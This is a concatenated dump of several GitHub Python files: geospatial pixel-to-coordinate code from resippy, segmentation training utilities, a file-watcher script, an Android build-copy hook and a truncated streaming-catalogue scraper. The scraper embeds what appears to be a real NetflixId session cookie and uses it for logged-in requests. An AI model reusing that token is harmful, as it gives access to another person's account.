labels[int(0.8*len(labels)):]\r\n\r\n\r\n\r\n# Creation of TF records\r\n#createDataRecord('train.tfrecords', train_list_images, train_labels)\r\n#createDataRecord('val.tfrecords', val_list_images, val_labels)\r\n#createDataRecord('test.tfrecords', test_list_images, test_labels)\r\n\r\n\r\n# clean up un necessary variables\r\n\r\ndel (c,list_images,labels)","repo_name":"nitheeshmuthuraj/age-gender-determination-of-a-person-with-image-data-Convloution-netural-network-","sub_path":"create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26097690053","text":"from __future__ import division\n\nimport abc\nfrom numpy import ndarray\nfrom pyproj import Proj\nfrom pyproj import transform as proj_transform\nimport numpy as np\nimport numbers\nfrom resippy.photogrammetry.dem.abstract_dem import AbstractDem\nimport resippy.utils.image_utils.image_utils as image_utils\nfrom six import add_metaclass\n\n\n@add_metaclass(abc.ABCMeta)\nclass AbstractEarthOverheadPointCalc:\n \"\"\"\n This is the Abstract Earth Overhead Point Calculator class. Concrete implementations for specific types of\n Overhead Earth Point Calculators should be created for the specific Earth Overhead Image Objects they support.\n \"\"\"\n\n def __init__(self):\n # TODO add parameters that specify the point calculator's altitude reference datum.\n \"\"\"\n This is used to initialize the point calculator. There following class variables store information about\n the point calculator:\n _lon_lat_center_approximate: The approximate (longitude, latitude) center of the the image\n _projection: The native projection of the point calculator\n _bands_coregistered: If the image this point calculator supports has multiple bands this variable\n specifies whether or not they are coregistered.\n \"\"\"\n self._lon_lat_center_approximate = None\n self._projection = None\n self._bands_coregistered = True\n\n @abc.abstractmethod\n def _lon_lat_alt_to_pixel_x_y_native(self,\n lons, # type: ndarray\n lats, # type: ndarray\n alts, # type: ndarray\n band=None # type: int\n ): # type: (...) -> (ndarray, ndarray)\n \"\"\"\n This is an protected abstract method that can be implemented for concrete implementations of this class.\n A point calculator should implement either this method or _pixel_x_y_alt_to_lon_lat_native. If this method\n is not implemented and _pixel_x_y_alt_to_lon_lat_native is, then this method can be solved for with iterative\n methods.\n :param lons: longitudes in the point calculator's native projection, provided as a numpy ndarray\n :param lats: latitudes in the point calculator's native projection, provided as a numpy ndarray\n :param alts: altitudes in the point calculator's native elevation datum reference, provided as a numpy ndarray\n :param band: specific image band provided as an int. If this variable is None it assumes all bands are\n coregistered\n :return: (pixel_x, pixel_y) provided as a tuple of numpy ndarrays\n \"\"\"\n pass\n\n @abc.abstractmethod\n def _pixel_x_y_alt_to_lon_lat_native(self,\n pixel_xs, # type: ndarray\n pixel_ys, # type: ndarray\n alts=None, # type: ndarray\n band=None # type: int\n ): # type: (...) -> (ndarray, ndarray)\n \"\"\"\n This is an protected abstract method that can be implemented for concrete implementations of this class.\n A point calculator should implement either this method or _lon_lat_alt_to_pixel_x_y_native. If this method\n is not implemented and _lon_lat_alt_to_pixel_x_y_native is, then this method can be solved for with iterative\n methods. This functionality is provided automatically within the pixel_x_y_alt_to_lon_lat method of this.\n class.\n :param pixel_xs: x pixels, provided as a numpy ndarray\n :param pixel_ys: y pixels, provided as a numpy ndarray\n :param alts: altitudes in the point calculator's native elevation datum reference, provided as a numpy ndarray\n :param band: specific image band provided as an int. If this variable is None it assumes all bands are coregistered\n :return: (longitudes, latitudes) in the point calculator's native projection, provided as a tuple of numpy\n ndarrays\n \"\"\"\n pass\n\n def lon_lat_alt_to_pixel_x_y(self,\n lons, # type: ndarray\n lats, # type: ndarray\n alts, # type: ndarray\n world_proj=None, # type: Proj\n band=None # type: int\n ): # type: (...) -> (ndarray, ndarray)\n \"\"\"\n This method calculates pixel x / y values given longitude, latitude and altitude information. It uses\n _lon_lat_alt_to_pixel_x_y_native under the hood, and provides some convenience to the user. These\n conveniences include automatic handling of different projections, and also allows the user to input\n longitudes, latitudes and altidues as either 1d or 2d numpy arrays. The results will be output in the\n same dimensions as the inputs.\n :param lons: longitudes provided as a numpy ndarray, can be either 1d or 2d numpy array, or a single float value\n :param lats: latitudes provided as a numpy ndarray, can be either 1d or 2d numpy array, or a single float value\n :param alts: altitudes in the point calculator's native elevation datum reference, provided as a numpy ndarray\n :param world_proj: projection of the input longitudes and latitudes\n :param band: specific image band provided as an int. If this variable is None it assumes all bands are coregistered\n :return: (pixel x, pixel y) as a tuple of numpy ndarrays (1d or 2d), or a tuple of float. The output will match the input\n \"\"\"\n # check for some errors up front\n if alts is None:\n alts = 0\n # standardize inputs, make everything 1 dimensional ndarrays\n lons_is_number = isinstance(lons, numbers.Number)\n lats_is_number = isinstance(lats, numbers.Number)\n alts_is_number = isinstance(alts, numbers.Number)\n if lons_is_number or lats_is_number:\n lons = np.array([lons])\n lats = np.array([lats])\n if alts_is_number:\n alts = np.zeros(lons.shape) + alts\n world_xyz_is_2d = False\n # auto-detect if world x-y-z arrays are 2d and flatten world_x and world_y arrays they are are 2d.\n # This is done to make all the vector math less complicated and keep it fast without needing to use loops\n if np.ndim(lons) == 2:\n world_xyz_is_2d = True\n nx = np.shape(lons)[1]\n ny = np.shape(lons)[0]\n lons = np.reshape(lons, nx * ny)\n lats = np.reshape(lats, nx * ny)\n alts = np.reshape(alts, nx * ny)\n\n # now actually do the calculations with everything in a standard form\n if world_proj is None:\n world_proj = self.get_projection()\n if world_proj.srs != self.get_projection().srs:\n lons, lats, alts = proj_transform(world_proj, self.get_projection(), lons, lats, alts)\n pixel_coords = self._lon_lat_alt_to_pixel_x_y_native(lons, lats, alts, band)\n\n if lons_is_number or lats_is_number:\n pixel_coords = pixel_coords[0][0], pixel_coords[1][0]\n\n # now transform everything back if it wasn't in a standard form coming in\n # unflatten world_xyz arrays if the original inputs were 2d\n if world_xyz_is_2d:\n pixel_coords_x_2d = np.reshape(pixel_coords[0], (ny, nx))\n pixel_coords_y_2d = np.reshape(pixel_coords[1], (ny, nx))\n return pixel_coords_x_2d, pixel_coords_y_2d\n\n return pixel_coords\n\n def pixel_x_y_alt_to_lon_lat(self,\n pixel_xs, # type: ndarray\n pixel_ys, # type: ndarray\n alts, # type: ndarray\n world_proj=None, # type: Proj\n band=None, # type: int\n pixel_error_threshold=0.01, # type: float\n max_iter=1000, # type: int\n ): # type: (...) -> (ndarray, ndarray)\n \"\"\"\n This will calculate a pixel's lon / lat location on earth. It uses _pixel_x_y_alt_to_lon_lat_native under the\n hood, and if that method is not implemented it will solve iteratively using _pixel_x_y_alt_to_lon_lat_native_solver.\n It provides conveniences to users such as automatic handling of world projections, and allows the user to input\n either numbers, or 1d or 2d numpy arrays as inputs for pixel values and altitudes.\n :param pixel_xs: x pixels, as either a float or 1d or 2d numpy array\n :param pixel_ys: y pixels, as either a float or 1d or 2d numpy array\n :param alts: altitudes in the point calculator's native elevation datum reference, provided as a numpy ndarray\n :param world_proj: projection of the input longitudes and latitudes\n :param band: band number of the image\n :param pixel_error_threshold: pixel threshold to use if the iterative solver is used. Defaults to 0.01 pixels\n :param max_iter: maximum iteration. This is used if the iterative solver does not converge to avoid entering\n an infinite loop. Defaults to 1000 iterations.\n :return: (lon, lat) as a tuple of float, or tuple of 1d or 2d numpy ndarray, to match the input of pixel_xs, and pixel_ys\n \"\"\"\n if world_proj is None:\n world_proj = self.get_projection()\n if self._pixel_x_y_alt_to_lon_lat_native(pixel_xs, pixel_ys, alts, band) is not None:\n native_lons, native_lats = self._pixel_x_y_alt_to_lon_lat_native(pixel_xs, pixel_ys, alts, band=band)\n else:\n native_lons, native_lats = \\\n self._pixel_x_y_alt_to_lon_lat_native_solver(pixel_xs,\n pixel_ys,\n alts,\n band=band,\n max_pixel_error=pixel_error_threshold,\n max_iter=max_iter)\n if world_proj.srs != self.get_projection().srs:\n lons, lats = proj_transform(self.get_projection(), world_proj, native_lons, native_lats)\n return lons, lats\n else:\n return native_lons, native_lats\n\n def _pixel_x_y_alt_to_lon_lat_native_solver(self,\n pixel_xs, # type: ndarray\n pixel_ys, # type: ndarray\n alts, # type: ndarray\n d_lon=None, # type: float\n d_lat=None, # type: float\n band=None, # type: int\n max_pixel_error=0.01, # type: float\n max_iter=1000, # type: int\n ): # type: (...) -> (ndarray, ndarray)\n \"\"\"\n This is a protected method that is used to solve for longitude, and latitude given pixel x, y and altitude values.\n It uses an approximation of a newton method solver.\n :param pixel_xs: pixel x values, as a 1d numpy ndarray\n :param pixel_ys: pixel y values, as a 1d numpy ndarray\n :param alts: altitudes in the point calculator's native elevation datum reference, provided as a numpy ndarray\n :param d_lon: delta_longitude to use for the newton-like solver. If it is not provided this value will be calculated\n :param d_lat: delta_latitude to use for the newton-like solver. If it is not provided this value will be calcualted\n :param band: image band as an int or None if all the bands are coregistered\n :param max_pixel_error: maximum pixel error. Same as the description in pixel_x_y_alt_to_lon_lat\n :param max_iter: Same as the description in pixel_x_y_alt_to_lon_lat\n :return: (longitude, latitude) in the point calculator's native projection, as a tuple of numpy ndarrays\n \"\"\"\n\n n_pixels = np.shape(pixel_xs)\n approximate_lon, approximate_lat = self.get_approximate_lon_lat_center()\n # initial lons and lats to all be the approximate center of the image\n lons, lats = np.zeros(n_pixels) + approximate_lon, np.zeros(n_pixels) + approximate_lat\n\n if d_lon is None or d_lat is None:\n d_pixel = 1\n # we want the delta to be on the order of 1 pixel or so, maybe change this later to scale with the errors\n machine_eps = np.finfo(lons.dtype).eps\n machine_max_val = np.finfo(lons.dtype).max\n machine_val_cutoff = machine_max_val / 4.0\n float_nums = []\n current_num = machine_eps\n while current_num < machine_val_cutoff:\n float_nums.append(current_num)\n current_num = current_num * 2\n float_nums = np.array(float_nums)\n machine_lons = np.zeros(np.shape(float_nums)) + approximate_lon\n machine_lats = np.zeros(np.shape(float_nums)) + approximate_lat\n machine_d_lons = machine_lons + float_nums\n machine_d_lats = machine_lats + float_nums\n machine_alt = np.average(alts)\n\n machine_pixel_lon_lat = \\\n self.lon_lat_alt_to_pixel_x_y(approximate_lon, approximate_lat, machine_alt, band=band)\n\n machine_lon_pixels_x, machine_lon_pixels_y = \\\n self.lon_lat_alt_to_pixel_x_y(machine_d_lons, machine_lats, machine_alt, band=band)\n machine_lat_pixels_x, machine_lat_pixels_y = \\\n self.lon_lat_alt_to_pixel_x_y(machine_lons, machine_d_lats, machine_alt, band=band)\n\n machine_pixels_lon_x_diff = machine_lon_pixels_x - machine_pixel_lon_lat[0]\n machine_pixels_lon_y_diff = machine_lon_pixels_y - machine_pixel_lon_lat[1]\n\n machine_pixels_lat_x_diff = machine_lat_pixels_x - machine_pixel_lon_lat[0]\n machine_pixels_lat_y_diff = machine_lat_pixels_y - machine_pixel_lon_lat[1]\n\n # find the first index where a shift in longitude is greater than 1 pixel\n # TODO: this is broken in some cases. fix and add unit tests.\n if np.isnan(machine_pixels_lon_x_diff).max() and np.isnan(machine_pixels_lon_x_diff).max():\n d_lon = 2\n d_lat = 2\n else:\n lon_gt1_pixel_index = (np.where(np.square(machine_pixels_lon_x_diff) +\n np.square(machine_pixels_lon_y_diff) > np.square(d_pixel))[0])[0]\n d_lon = machine_d_lons[lon_gt1_pixel_index] - approximate_lon\n\n # find the first index where a shift in longitude is greater than 1 pixel\n lat_gt1_pixel_index = (np.where(np.square(machine_pixels_lat_x_diff) +\n np.square(machine_pixels_lat_y_diff) > np.square(d_pixel))[0])[0]\n d_lat = machine_d_lats[lat_gt1_pixel_index] - approximate_lat\n\n for i in range(max_iter):\n pixel_x_estimate, pixel_y_estimate = self.lon_lat_alt_to_pixel_x_y(lons, lats, alts, band=band)\n\n lon_shift = lons + d_lon\n lat_shift = lats + d_lat\n\n pixel_x_shift_x, pixel_y_shift_x = self.lon_lat_alt_to_pixel_x_y(lon_shift, lats, alts, band=band)\n pixel_x_shift_y, pixel_y_shift_y = self.lon_lat_alt_to_pixel_x_y(lons, lat_shift, alts, band=band)\n\n pxx = (pixel_x_shift_x - pixel_x_estimate) / d_lon\n pxy = (pixel_x_shift_y - pixel_x_estimate) / d_lat\n pyx = (pixel_y_shift_x - pixel_y_estimate) / d_lon\n pyy = (pixel_y_shift_y - pixel_y_estimate) / d_lat\n\n delta_px = pixel_xs - pixel_x_estimate\n delta_py = pixel_ys - pixel_y_estimate\n\n delta_lat = (delta_py * pxx - pyx * delta_px) / (pyy * pxx - pxy * pyx)\n delta_lon = (delta_px - delta_lat * pxy) / pxx\n\n new_lons = lons + delta_lon\n new_lats = lats + delta_lat\n\n new_pixel_x, new_pixel_y = self.lon_lat_alt_to_pixel_x_y(new_lons, new_lats, alts, band=band)\n\n lons = new_lons\n lats = new_lats\n\n x_err = np.abs(pixel_xs - new_pixel_x).max()\n y_err = np.abs(pixel_ys - new_pixel_y).max()\n\n if x_err <= max_pixel_error and y_err <= max_pixel_error:\n break\n\n return lons, lats\n\n def _pixel_x_y_to_lon_lat_ray_caster_native(self,\n pixels_x, # type: ndarray\n pixels_y, # type: ndarray\n dem, # type: AbstractDem\n dem_sample_distance, # type: float\n dem_highest_alt=None, # type: float\n dem_lowest_alt=None, # type: float\n band=None, # type: int\n ): # type: (...) -> (ndarray, ndarray, ndarray)\n \"\"\"\n Protected method that solves for pixel x, y by casting rays onto a DEM. This is used when the pixel altitudes\n are not already known, and only a method for _lon_lat_alt_to_pixel_x_y_native is available.\n :param pixels_x: x pixels, as a numpy ndarray\n :param pixels_y: y pixels, as a numpy ndarray\n :param dem: digital elevation model, as concrete implementation of an AbstractDem object\n :param dem_sample_distance: resolution at which to sample the DEM, in meters. If no value is provided\n this value will default to 5 meters.\n :param dem_highest_alt: Highest DEM altitude. This will be calculated using the full DEM if it is not provided\n :param dem_lowest_alt: Lowest DEM altitude. This will be calculated using the full DEM if it is not provided\n :param band: image band, as an int, or None if all the image bands are coregistered.\n :return: (longitude, latitude, altitude) in the point calculator's native projection, and the input DEM's\n elevation reference dataum\n \"\"\"\n\n # TODO put stuff in here to make sure nx and ny are same size\n # TODO put something here to check that the DEM projection and image projection are the same\n ny = None\n nx = None\n is2d = np.ndim(pixels_x) == 2\n if is2d:\n ny, nx = np.shape(pixels_x)\n pixels_x = image_utils.flatten_image_band(pixels_x)\n pixels_y = image_utils.flatten_image_band(pixels_y)\n\n n_pixels_to_project = len(pixels_x)\n\n max_alt = dem_highest_alt\n min_alt = dem_lowest_alt\n\n if max_alt is None:\n max_alt = dem.get_highest_alt()\n if min_alt is None:\n min_alt = dem.get_lowest_alt()\n alt_range = max_alt - min_alt\n\n # put the max and min alts at 1 percent above and below the maximum returned by the DEM\n max_alt = max_alt + alt_range * 0.01\n min_alt = min_alt - alt_range * 0.01\n\n lons_max_alt, lats_max_alt = self.pixel_x_y_alt_to_lon_lat(pixels_x, pixels_y, max_alt, band=band)\n lons_min_alt, lats_min_alt = self.pixel_x_y_alt_to_lon_lat(pixels_x, pixels_y, min_alt, band=band)\n\n # TODO this operation becomes very expensive at very fine DEM resolutions\n # TODO create implementation for a raster DEM that works faster\n # TODO the time consuming operations are obtaining lon/lats for many points as the DEM resolution becomes finer\n\n ray_horizontal_lens = np.sqrt(\n np.square(lons_max_alt - lons_min_alt) + np.square(lats_max_alt - lats_min_alt))\n n_steps_per_ray = int(np.ceil(np.max(ray_horizontal_lens) / dem_sample_distance) + 1)\n\n lons_matrix = np.zeros((n_pixels_to_project, n_steps_per_ray)) + np.linspace(0, 1, n_steps_per_ray)\n lats_matrix = np.zeros((n_pixels_to_project, n_steps_per_ray)) + np.linspace(0, 1, n_steps_per_ray)\n\n lons_matrix = np.tile((lons_min_alt - lons_max_alt), (n_steps_per_ray, 1)).transpose() * \\\n lons_matrix + np.tile(lons_max_alt, (n_steps_per_ray, 1)).transpose()\n lats_matrix = np.tile((lats_min_alt - lats_max_alt), (n_steps_per_ray, 1)).transpose() * \\\n lats_matrix + np.tile(lats_max_alt, (n_steps_per_ray, 1)).transpose()\n\n all_elevations = dem.get_elevations(np.array(lons_matrix), np.array(lats_matrix), world_proj=self.get_projection())\n\n ray = np.linspace(max_alt, min_alt, n_steps_per_ray)\n first_ray_intersect_indices = np.zeros(n_pixels_to_project, dtype=np.int)\n ray_step_indices = list(range(n_steps_per_ray))\n ray_step_indices.reverse()\n for i in ray_step_indices:\n does_ray_intersect = all_elevations[:, i] > ray[i]\n first_ray_intersect_indices[np.where(does_ray_intersect)] = i\n\n all_pixel_indices = np.arange(0, n_pixels_to_project, dtype=int)\n\n first_ray_intersect_indices = first_ray_intersect_indices - 1\n second_ray_intersect_indices = first_ray_intersect_indices + 1\n b_rays = ray[first_ray_intersect_indices]\n b_alts = all_elevations[all_pixel_indices, first_ray_intersect_indices]\n\n m_rays = ray[1] - ray[0]\n m_alts = all_elevations[all_pixel_indices, second_ray_intersect_indices] - b_alts\n\n xs = (b_alts - b_rays) / (m_rays - m_alts)\n intersected_lons = (lons_matrix[all_pixel_indices, second_ray_intersect_indices] -\n lons_matrix[all_pixel_indices, first_ray_intersect_indices]) * xs + \\\n lons_matrix[all_pixel_indices, first_ray_intersect_indices]\n intersected_lats = (lats_matrix[all_pixel_indices, second_ray_intersect_indices] -\n lats_matrix[all_pixel_indices, first_ray_intersect_indices]) * xs + \\\n lats_matrix[all_pixel_indices, first_ray_intersect_indices]\n intersected_alts = (all_elevations[all_pixel_indices, second_ray_intersect_indices] -\n all_elevations[all_pixel_indices, first_ray_intersect_indices]) * xs + \\\n all_elevations[all_pixel_indices, first_ray_intersect_indices]\n\n if is2d:\n intersected_lons = image_utils.unflatten_image_band(intersected_lons, nx, ny)\n intersected_lats = image_utils.unflatten_image_band(intersected_lats, nx, ny)\n intersected_alts = image_utils.unflatten_image_band(intersected_alts, nx, ny)\n\n return intersected_lons, intersected_lats, intersected_alts\n\n\n def pixel_x_y_to_lon_lat_alt(self,\n pixels_x, # type: ndarray\n pixels_y, # type: ndarray\n dem, # type: AbstractDem\n world_proj=None, # type: Proj\n dem_sample_distance=None, # type: float\n dem_highest_alt=None, # type: float\n dem_lowest_alt=None, # type: float\n band=None, # type: int\n ): # type: (...) -> (float, float, float)\n \"\"\"\n Solves for pixel x, y by casting rays onto a DEM. Uses _pixel_x_y_to_lon_lat_ray_caster_native under the hood\n and provides some convenience to the user, such as automatic handling of world projections\n :param pixels_x: x pixels, as a 1d or 2d numpy ndarray\n :param pixels_y: y pixels, as a 1d or 2d numpy ndarray\n :param dem: concrete implementation of an AbstractDem, defaults to a flat earth DEM with an elevation of zero if\n this parameter is not provided.\n :param world_proj: world projection of the output longitudes and latitudes.\n :param dem_sample_distance: sample distance to use when sampling the DEM. Defaults to 5 meters\n :param dem_highest_alt: Highest DEM altitude. This will be calculated using the full DEM if it is not provided\n :param dem_lowest_alt: Lowest DEM altitude. This will be calculated using the full DEM if it is not provided\n :param band: Image band, as an int, or None if all of the image bands are coregistered.\n :return: (longitude, latitude, altitude) in the projection specified by the world_proj input parameter, and\n The altitude specified by the input dem object parameter.\n \"\"\"\n\n DEFAULT_DEM_SAMPLE_DISTANCE = 5\n if dem_sample_distance is None:\n dem_sample_distance = DEFAULT_DEM_SAMPLE_DISTANCE\n\n if world_proj is None:\n world_proj = self.get_projection()\n\n native_lons, native_lats, native_alts = self._pixel_x_y_to_lon_lat_ray_caster_native(pixels_x, pixels_y, dem,\n dem_sample_distance,\n dem_highest_alt,\n dem_lowest_alt,\n band=band)\n\n if world_proj.srs != self.get_projection().srs:\n lons, lats = proj_transform(self.get_projection(), world_proj, native_lons, native_lats)\n return lons, lats, native_alts\n else:\n return native_lons, native_lats, native_alts\n\n def get_projection(self): # type: (...) -> Proj\n \"\"\"\n returns the point calculator's native projection\n :return: point calculator's native projection as a pyproj Proj object\n \"\"\"\n return self._projection\n\n def set_projection(self,\n projection # type: Proj\n ): # type: (...) -> None\n \"\"\"\n sets the point calculator's native projection. This should only be used when creating a new point calculator\n :param projection: point calculator's native projection as a pyproj Proj object\n :return: None\n \"\"\"\n self._projection = projection\n\n def get_approximate_lon_lat_center(self): # type: (...) -> (float, float)\n \"\"\"\n Gets the point calculator's approximate lon/lat center, in the point calculator's native projection. This\n assumes that the lon / lat center was set when the point calculator was initialized.\n :return: (lon, lat) as a tuple of floats\n \"\"\"\n return self._lon_lat_center_approximate\n\n def set_approximate_lon_lat_center(self,\n lon, # type: float\n lat # type: float\n ): # type: (...) -> (float, float)\n \"\"\"\n sets the point calculator's approximate lon / lat center. This should only be used when creating a new\n point calculator.\n :param lon: longitude, in the point calculator's native projection\n :param lat: latitude, in the point calculator's native projection\n :return: None\n \"\"\"\n self._lon_lat_center_approximate = (lon, lat)\n\n def bands_coregistered(self): # type: (...) -> bool\n \"\"\"\n returns a boolean that says whether or not the image object's spectral bands are coregistered. If bands are\n not coregistered then lon/lat to pixel (or vice versa) calculations must be performed for each band. If bands\n are coregistered then these calculations only need to be done once.\n :return: boolean, False if bands are not coregistered, True if they are.\n \"\"\"\n return self._bands_coregistered\n","repo_name":"BeamIO-Inc/resippy","sub_path":"resippy/image_objects/earth_overhead/earth_overhead_point_calculators/abstract_earth_overhead_point_calc.py","file_name":"abstract_earth_overhead_point_calc.py","file_ext":"py","file_size_in_byte":28239,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"40351071938","text":"import os, random, torch, json\nimport numpy as np\n\n\ndef mkdir(path):\n if not os.path.exists(path):\n os.mkdir(path)\n \n \ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n \n \ndef get_writer(config, main_rank):\n if config.use_tb and main_rank:\n from torch.utils.tensorboard import SummaryWriter\n writer = SummaryWriter(config.tb_log_dir)\n else:\n writer = None\n return writer\n \n \ndef get_logger(config, main_rank):\n if main_rank:\n import sys\n from loguru import logger\n logger.remove()\n logger.add(sys.stderr, format=\"[{time:YYYY-MM-DD HH:mm}] {message}\", level=\"INFO\")\n\n log_path = f'{config.save_dir}/{config.logger_name}.log'\n logger.add(log_path, format=\"[{time:YYYY-MM-DD HH:mm}] {message}\", level=\"INFO\")\n else:\n logger = None\n return logger\n\n\ndef save_config(config):\n config_dict = vars(config)\n with open(f'{config.save_dir}/config.json', 'w') as f:\n json.dump(config_dict, f, indent=4)\n\n\ndef log_config(config, logger):\n keys = ['dataset', 'num_class', 'model', 'encoder', 'decoder', 'loss_type', \n 'optimizer_type', 'lr_policy', 'total_epoch', 'train_bs', 'val_bs', \n 'train_num', 'val_num', 'gpu_num', 'num_workers', 'amp_training', \n 'DDP', 'kd_training', 'synBN', 'use_ema', 'use_aux']\n \n config_dict = vars(config)\n infos = f\"\\n\\n\\n{'#'*25} Config Informations {'#'*25}\\n\" \n infos += '\\n'.join('%s: %s' % (k, config_dict[k]) for k in keys)\n infos += f\"\\n{'#'*71}\\n\\n\"\n logger.info(infos)\n \n\ndef get_colormap(config):\n if config.colormap == 'cityscapes':\n colormap = {0:(128, 64,128), 1:(244, 35,232), 2:( 70, 70, 70), 3:(102,102,156),\n 4:(190,153,153), 5:(153,153,153), 6:(250,170, 30), 7:(220,220, 0),\n 8:(107,142, 35), 9:(152,251,152), 10:( 70,130,180), 11:(220, 20, 60),\n 12:(255, 0, 0), 13:( 0, 0,142), 14:( 0, 0, 70), 15:( 0, 60,100),\n 16:( 0, 80,100), 17:( 0, 0,230), 18:(119, 11, 32)}\n\n elif config.colormap == 'custom':\n raise NotImplementedError()\n \n else:\n raise ValueError(f'Unsupport colormap type: {config.colormap}.')\n\n colormap = [color for color in colormap.values()]\n \n if len(colormap) < config.num_class:\n raise ValueError('Length of colormap is smaller than the number of class.')\n else:\n return colormap[:config.num_class]","repo_name":"zh320/realtime-semantic-segmentation-pytorch","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"11874594751","text":"#!/usr/bin/python\n#adding random comment\n#want to remove comment\nimport time\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\nfrom fileRename import renameFile\n\nclass MyHandler(FileSystemEventHandler):\n def on_modified(self, event):\n print (\"Got it, modified eventcalled!\")\n print (event.event_type,event.src_path)\n def on_created(self, event):\n print (\"New file created\")\n #print (event.event_type,event.src_path)\n filename=str(event.src_path)\n print ('before even fired'+filename)\n renameFile(filename)\n\nif __name__ == \"__main__\":\n event_handler = MyHandler()\n observer = Observer()\n observer.schedule(event_handler, path='.', recursive=False)\n observer.start()\n\n try:\n while True:\n time.sleep(0.5)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()","repo_name":"Arup/jobSearchBot","sub_path":"loggingeventhandler.py","file_name":"loggingeventhandler.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29990803314","text":"from typing import Any, Callable\nfrom torchvision.models.segmentation.deeplabv3 import DeepLabV3\nfrom datasets.silo_idda import SiloIddaDataset\nfrom experiment.silo_client import SiloClient\nfrom models.abs_factories import OptimizerFactory, SchedulerFactory\nfrom utils.stream_metrics import StreamSegMetrics\n\n\nclass BasicSiloClient(SiloClient):\n\n def __init__(self, \n n_epochs: int, \n batch_size: int, \n reduction: Callable[[Any], Any], \n dataset: SiloIddaDataset, \n model: DeepLabV3, \n optimizer_factory: OptimizerFactory, \n scheduler_factory: SchedulerFactory, \n criterion: Callable[[Any], Any], \n cluster_id: int, \n test_client=False):\n super().__init__(n_epochs, \n batch_size, \n reduction, \n dataset, \n model, \n optimizer_factory, \n scheduler_factory, \n criterion, \n cluster_id, \n test_client)\n \n def test(self, metric: StreamSegMetrics):\n state = self.model.state_dict()\n for k, v in state.items():\n if \"bn.running\" in k or \"bn.num_batches_tracked\" in k:\n state[k] = None\n if \"bn.track_running_stats\" in k:\n state[k] = False\n super().test(metric)\n","repo_name":"elequaranta/MLDL23-FL-project","sub_path":"experiment/basic_silo_client.py","file_name":"basic_silo_client.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"8561098477","text":"#!/usr/bin/env python3 \n\nimport os\nimport sys\nimport shutil\n\n\ndef get_na_path(): \n return os.path.join(sys.argv[2])\n\ndef get_build_path():\n return os.path.join(sys.argv[3], \"../../build\") \n\n\ndef run():\n build_path = get_build_path()\n na_path = get_na_path()\n if len(na_path) == 0:\n print(\"Not found na-proj path!Hook exist!\")\n print(\"Build path is ->%s\"%build_path)\n print(\"Native path is ->%s\"%na_path)\n gen_list = [\n \"UnityfoNa/unityLibrary/src/main/jniLibs\",\n \"UnityfoNa/unityLibrary/src/main/assets\",\n ]\n tar_list = [\n \"unityLibrary/src/main/jniLibs\",\n \"unityLibrary/src/main/assets\"\n ]\n\n if len(gen_list) != len(tar_list):\n print(\"Copy from path count must equal tar path count!\")\n sys.exit(2)\n\n for i in gen_list:\n f_p = os.path.join(build_path, i)\n t_p = os.path.join(na_path, i)\n if not os.path.isdir(f_p):\n print(\"Copy from path <%s> is not exist!\"%f_p)\n sys.exit(2)\n\n if os.path.isdir(t_p):\n shutil.rmtree(t_p)\n print(\"Coyp the path...from <{f}> \\n to <{t}>\\n\".format(f = f_p, t = t_p))\n shutil.copytree(f_p, t_p)\n","repo_name":"dingcode-icu/ucmd","sub_path":"test/.ucmd_hook/after/android_at.py","file_name":"android_at.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6693463759","text":"from lxml import html\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\n\nnetflix_id = 'ct%3DBQAOAAEBEATp0bYq7WpJobwE2PxFi1GB0OFGe9fyVUGgEmMKudOmST2ospxDejcLabZb-a3zFhSIPmLL-LubOlcp18DC1Yp9IQXlyR-y6mOSGwjo5snK8SeWZT_z-w71QLKFhyjD8DxGi-IpD0DSTNQefMjFyNNV67Y-sXKb8o-J4bQjokQ-xBESCmMrVuJxaALTgveeeqd_jRGsQOoSIluQyKzsdqELELCbD_GTy3IyatEK9nUrINjfOXOvNg-PsTpF3Xou10c2iI0Ej1siUbvAvpBmoQFkBrGL5PisSMHdK6tNn01yNu6LCClx6UTzqothGEmyCJVydaX1JpwSSOPCN42-0YcDsBwOLkSJLW8FqF4Ips_qouQPjxmCDJ_e4Zwo2cO0o8NHbmo98vncxn1cz6SY0IAKXHppjRygwjEEucUN1SgLoBec1qIT-PZcrtXxukU38VEgLObxMD7Dafz7UV_Ix0bZrNN75eD1W4bKq5fXgpIyvCdRJA7kWquTvf1aTemdIyBzkZgjo9_rHIw_iR7vjkQJSnA6h8xZchCLU_i-79CRtSWmlkxfrrRxvZiDtB-_VrUp8TvS-0C7FJGWRX0fuGBVFd8evPKo8KHpz0HJ2lhNJ7p54rMuh0jkmUXxcdsS1buS%26bt%3Ddbl%26ch%3DAQEAEAABABQAaWFmKVnfQE_QTXzpHQwZOGaGPlFZ0k8.%26v%3D2%26mac%3DAQEAEAABABQmXZcAB1cgpvmlTl2g6utsyl_XbKPPxv0.'\n\ndef scrape_netflix(title):\n\tcookies = {'NetflixId' : netflix_id,\n 'profilesNewSession' : '0',\n 'profilesNewUser' : '0'\n }\n\twith requests.Session() as s:\n\t response = s.get(\"https://www.netflix.com/search?q=\" + title, cookies = cookies)\n\tsearch_results_page = BeautifulSoup(response.content, 'lxml')\n\tsearch_results_list = search_results_page.find_all('div', 'title-card-container')\n\tfor result in search_results_list:\n\t\tif list(result.descendants)[0]['aria-label'].lower() == title.lower():\n\t\t\treturn True\n\treturn False\n\ndef scrape_amazon(title):\n\tresponse = requests.get('https://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Dinstant-video&field-keywords=' + title)\n\tsearch_results_page = BeautifulSoup(response.content, 